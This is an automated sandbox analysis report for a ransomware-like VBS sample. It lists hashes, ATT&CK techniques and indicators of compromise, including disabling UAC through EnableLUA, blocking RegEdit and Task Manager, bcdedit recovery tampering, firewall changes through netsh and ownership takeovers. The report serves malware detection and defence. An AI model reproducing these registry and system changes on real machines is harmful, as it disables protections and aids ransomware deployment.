8d1cee07b1f4153c602c7af67f13391da300cc488e69b59279b1a8d75106d864

Analysis

max time kernel
159s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
19-05-2024 15:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

malware.vbs
Size

6KB
MD5

e0776095121712202c80802058348633
SHA1

6915df50e7944d289d789085428fd73ba01c6653
SHA256

8d1cee07b1f4153c602c7af67f13391da300cc488e69b59279b1a8d75106d864
SHA512

7aaf8b33a91da07a62f9491c50c4637e9f1fee83d76ef3df9dc6843f1448457a93f892a1a1d93566aea2d08e9abcbfa25a943b52984f8669949eb2509d8ce1a6
SSDEEP

96:qD2WSNb8mN8r9f4PPfMSHnx2gqoij8RW8E/zmdPzWdEKuWP2W9NukS/Mom2i:qD8qrZgX7yrCdPidfbUG2i

Score

10^/10

discovery evasion execution exploit persistence ransomware trojan

Malware Config

Signatures

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Modifies boot configuration data using bcdedit 1 TTPs 8 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid process

5172 bcdedit.exe
5348 bcdedit.exe
5820 bcdedit.exe
4808 bcdedit.exe
5148 bcdedit.exe
5880 bcdedit.exe
5872 bcdedit.exe
1904 bcdedit.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

pid	process
5172	bcdedit.exe
5348	bcdedit.exe
5820	bcdedit.exe
4808	bcdedit.exe
5148	bcdedit.exe
5880	bcdedit.exe
5872	bcdedit.exe
1904	bcdedit.exe

Disables RegEdit via registry modification 1 IoCs

evasion

Processes:

reg.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
evasion

Modifies Windows Firewall 2 TTPs 20 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid	process
5308	netsh.exe
5444	netsh.exe
3672	netsh.exe
5848	netsh.exe
5624	netsh.exe
5520	netsh.exe
2504	netsh.exe
6016	netsh.exe
4228	netsh.exe
2440	netsh.exe
4728	netsh.exe
3104	netsh.exe
5184	netsh.exe
4932	netsh.exe
2412	netsh.exe
1488	netsh.exe
2720	netsh.exe
4920	netsh.exe
6068	netsh.exe
5136	netsh.exe

Possible privilege escalation attempt 12 IoCs

exploit

Processes:

icacls.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exe

pid	process
5160	icacls.exe
5336	icacls.exe
2708	takeown.exe
5344	icacls.exe
3328	takeown.exe
2440	icacls.exe
5840	takeown.exe
5804	icacls.exe
4848	takeown.exe
5344	takeown.exe
5444	icacls.exe
5288	takeown.exe

Modifies file permissions 1 TTPs 12 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exe

pid	process
5344	takeown.exe
5288	takeown.exe
5336	icacls.exe
3328	takeown.exe
2440	icacls.exe
2708	takeown.exe
5840	takeown.exe
5160	icacls.exe
5444	icacls.exe
5344	icacls.exe
5804	icacls.exe
4848	takeown.exe

Drops file in System32 directory 25 IoCs

Processes:

OpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db	OpenWith.exe

Drops file in Windows directory 1 IoCs

Processes:

netsh.exe

description ioc process

File created C:\Windows\rescache\_merged\431186354\3919016826.pri netsh.exe
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

3912 sc.exe
5672 sc.exe
5232 sc.exe
708 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\rescache\_merged\431186354\3919016826.pri	netsh.exe

pid	process
3912	sc.exe
5672	sc.exe
5232	sc.exe
708	sc.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exemsedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Gathers network information 2 TTPs 4 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exeipconfig.exeipconfig.exeipconfig.exe

pid process

3672 ipconfig.exe
5644 ipconfig.exe
5532 ipconfig.exe
4200 ipconfig.exe

pid	process
3672	ipconfig.exe
5644	ipconfig.exe
5532	ipconfig.exe
4200	ipconfig.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

netsh.exereg.exereg.exereg.exenetsh.exereg.exereg.exereg.exereg.exereg.execmd.exereg.exeOpenWith.exeOpenWith.execmd.exeOpenWith.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.PeopleExperienceHost_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\icsvc.dll,-700 = "Virtual Machine Monitoring"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System	reg.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E44E9428-BDBC-4987-A099-40DC8FD255E7} {7F9185B0-CB92-43C5-80A9-92277A4F7B54} 0xFFFF = 0100000000000000c18bc70205aada01	cmd.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri\1d5acdddadc1b8f\a01460c8\@{Microsoft.XboxGameCallableUI_1000.19041.1023.0_neutral_neutral_cw5n1h2txyewy? = "Xbox Game UI"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri\1d5acddee1afafc\a01460c8\@{Microsoft.Windows.Apprep.ChxApp_1000.19041.1023.0_neutral_neutral_cw5n1h2t = "Windows Defender SmartScreen"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri\1d5ace438733a83\a01460c8	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache\	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.LockApp_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AccountsControl_cw5n1h2txyewy%5Cresources.pri\1d7e5366768b0fd\a01460c8\@{Microsoft.AccountsControl_10.0.19041.1023_neutral__cw5n1h2txyewy?ms-resource://M = "Email and accounts"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d5acddea4e2414\a01460c8\@{Microsoft.Windows.StartMenuExperienceHost_10.0.19041.1023_neutra = "Start"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri\1d5ace438733a83\a01460c8\@{Microsoft.Windows.SecureAssessmentBrowser_10.0.19041.1023_neutra = "Take a Test"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@peerdistsh.dll,-9003 = "BranchCache - Hosted Cache Client (Uses HTTPS)"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\International	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.LockApp_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@sstpsvc.dll,-35001 = "Secure Socket Tunneling Protocol"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.ContentDeliveryManager_cw5n1h2txyewy%5Cresources.pri\1d5acddd82645c0\a01460c8	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@peerdistsh.dll,-9000 = "BranchCache - Content Retrieval (Uses HTTP)"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5Cmicrosoft.windows.narratorquickstart_8wekyb3d8bbwe%5Cresources.pri	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.ContentDeliveryManager_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Key created	\REGISTRY\USER\S-1-5-18_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-18_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d7e5369a06a26c\a01460c8	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	cmd.exe
Key created	\REGISTRY\USER\S-1-5-18_Classes\Local Settings	OpenWith.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5Cmicrosoft.windows.narratorquickstart_8wekyb3d8bbwe%5Cresources.pri\1d5acdded540f4d\a01460c8\@{Microsoft.Windows.NarratorQuickStart_10.0.19041.1023_neutral_neutral_ = "Narrator"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.ContentDeliveryManager_cw5n1h2txyewy%5Cresources.pri\1d5acddd82645c0\a01460c8\@{Microsoft.Windows.ContentDeliveryManager_10.0.19041.1023_neutral_ = "Microsoft Content"	netsh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Win32WebViewHost_cw5n1h2txyewy%5Cresources.pri\1d5acdef0fedca\a01460c8	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\Languages	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Search_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AccountsControl_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AccountsControl_cw5n1h2txyewy%5Cresources.pri\1d7e5366768b0fd\a01460c8	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Search_cw5n1h2txyewy%5Cresources.pri\1d7e5369da0bc36\a01460c8	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\firewallapi.dll,-37302 = "mDNS"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AccountsControl_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.PeopleExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d7e53672e17460\a01460c8\@{Microsoft.Windows.PeopleExperienceHost_10.0.19041.1023_neutral_neut = "Windows Shell Experience"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\Languages	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion	reg.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

Notepad.exe

pid process

2816 Notepad.exe
Runs .reg file with regedit 1 IoCs

Processes:

regedit.exe

pid process

5372 regedit.exe
Runs net.exe

pid	process
2816	Notepad.exe

pid	process
5372	regedit.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exeidentity_helper.exe

pid	process
4044	msedge.exe
4044	msedge.exe
4988	msedge.exe
4988	msedge.exe
5492	identity_helper.exe
5492	identity_helper.exe
2396	msedge.exe
2396	msedge.exe
5964	msedge.exe
5964	msedge.exe
4468	identity_helper.exe
4468	identity_helper.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs

Processes:

msedge.exemsedge.exe

pid	process
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe

Suspicious use of AdjustPrivilegeToken 42 IoCs

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exewhoami.exetakeown.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exewhoami.exetakeown.exetakeown.exetakeown.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exewhoami.exetakeown.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exewhoami.exetakeown.exe

description	pid	process
Token: SeShutdownPrivilege	4520	powercfg.exe
Token: SeCreatePagefilePrivilege	4520	powercfg.exe
Token: SeShutdownPrivilege	3456	powercfg.exe
Token: SeCreatePagefilePrivilege	3456	powercfg.exe
Token: SeShutdownPrivilege	2148	powercfg.exe
Token: SeCreatePagefilePrivilege	2148	powercfg.exe
Token: SeShutdownPrivilege	4932	powercfg.exe
Token: SeCreatePagefilePrivilege	4932	powercfg.exe
Token: SeDebugPrivilege	4956	whoami.exe
Token: SeTakeOwnershipPrivilege	5344	takeown.exe
Token: SeShutdownPrivilege	5648	powercfg.exe
Token: SeCreatePagefilePrivilege	5648	powercfg.exe
Token: SeShutdownPrivilege	5684	powercfg.exe
Token: SeCreatePagefilePrivilege	5684	powercfg.exe
Token: SeShutdownPrivilege	444	powercfg.exe
Token: SeCreatePagefilePrivilege	444	powercfg.exe
Token: SeShutdownPrivilege	6028	powercfg.exe
Token: SeCreatePagefilePrivilege	6028	powercfg.exe
Token: SeDebugPrivilege	5952	whoami.exe
Token: SeTakeOwnershipPrivilege	5288	takeown.exe
Token: SeTakeOwnershipPrivilege	3328	takeown.exe
Token: SeTakeOwnershipPrivilege	2708	takeown.exe
Token: SeShutdownPrivilege	4968	powercfg.exe
Token: SeCreatePagefilePrivilege	4968	powercfg.exe
Token: SeShutdownPrivilege	3960	powercfg.exe
Token: SeCreatePagefilePrivilege	3960	powercfg.exe
Token: SeShutdownPrivilege	6108	powercfg.exe
Token: SeCreatePagefilePrivilege	6108	powercfg.exe
Token: SeShutdownPrivilege	884	powercfg.exe
Token: SeCreatePagefilePrivilege	884	powercfg.exe
Token: SeDebugPrivilege	5868	whoami.exe
Token: SeTakeOwnershipPrivilege	5840	takeown.exe
Token: SeShutdownPrivilege	5660	powercfg.exe
Token: SeCreatePagefilePrivilege	5660	powercfg.exe
Token: SeShutdownPrivilege	4796	powercfg.exe
Token: SeCreatePagefilePrivilege	4796	powercfg.exe
Token: SeShutdownPrivilege	4556	powercfg.exe
Token: SeCreatePagefilePrivilege	4556	powercfg.exe
Token: SeShutdownPrivilege	764	powercfg.exe
Token: SeCreatePagefilePrivilege	764	powercfg.exe
Token: SeDebugPrivilege	3652	whoami.exe
Token: SeTakeOwnershipPrivilege	4848	takeown.exe

Suspicious use of FindShellTrayWindow 52 IoCs

Processes:

msedge.exemsedge.exe

pid	process
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe

Suspicious use of SendNotifyMessage 48 IoCs

Processes:

msedge.exemsedge.exe

pid	process
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
4988	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe
5964	msedge.exe

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

OpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exe

pid process

5936 OpenWith.exe
5732 OpenWith.exe
4192 OpenWith.exe
5844 OpenWith.exe
2336 OpenWith.exe
2444 OpenWith.exe

pid	process
5936	OpenWith.exe
5732	OpenWith.exe
4192	OpenWith.exe
5844	OpenWith.exe
2336	OpenWith.exe
2444	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exe

description	pid	process	target process
PID 4796 wrote to memory of 2000	4796	cmd.exe	net.exe
PID 4796 wrote to memory of 2000	4796	cmd.exe	net.exe
PID 2000 wrote to memory of 4580	2000	net.exe	net1.exe
PID 2000 wrote to memory of 4580	2000	net.exe	net1.exe
PID 4796 wrote to memory of 4520	4796	cmd.exe	powercfg.exe
PID 4796 wrote to memory of 4520	4796	cmd.exe	powercfg.exe
PID 4796 wrote to memory of 3456	4796	cmd.exe	powercfg.exe
PID 4796 wrote to memory of 3456	4796	cmd.exe	powercfg.exe
PID 4796 wrote to memory of 2148	4796	cmd.exe	powercfg.exe
PID 4796 wrote to memory of 2148	4796	cmd.exe	powercfg.exe
PID 4796 wrote to memory of 4932	4796	cmd.exe	powercfg.exe
PID 4796 wrote to memory of 4932	4796	cmd.exe	powercfg.exe
PID 4796 wrote to memory of 2504	4796	cmd.exe	netsh.exe
PID 4796 wrote to memory of 2504	4796	cmd.exe	netsh.exe
PID 4796 wrote to memory of 1488	4796	cmd.exe	netsh.exe
PID 4796 wrote to memory of 1488	4796	cmd.exe	netsh.exe
PID 4796 wrote to memory of 4228	4796	cmd.exe	netsh.exe
PID 4796 wrote to memory of 4228	4796	cmd.exe	netsh.exe
PID 4796 wrote to memory of 2720	4796	cmd.exe	netsh.exe
PID 4796 wrote to memory of 2720	4796	cmd.exe	netsh.exe
PID 4796 wrote to memory of 4728	4796	cmd.exe	netsh.exe
PID 4796 wrote to memory of 4728	4796	cmd.exe	netsh.exe
PID 4796 wrote to memory of 1620	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 1620	4796	cmd.exe	reg.exe
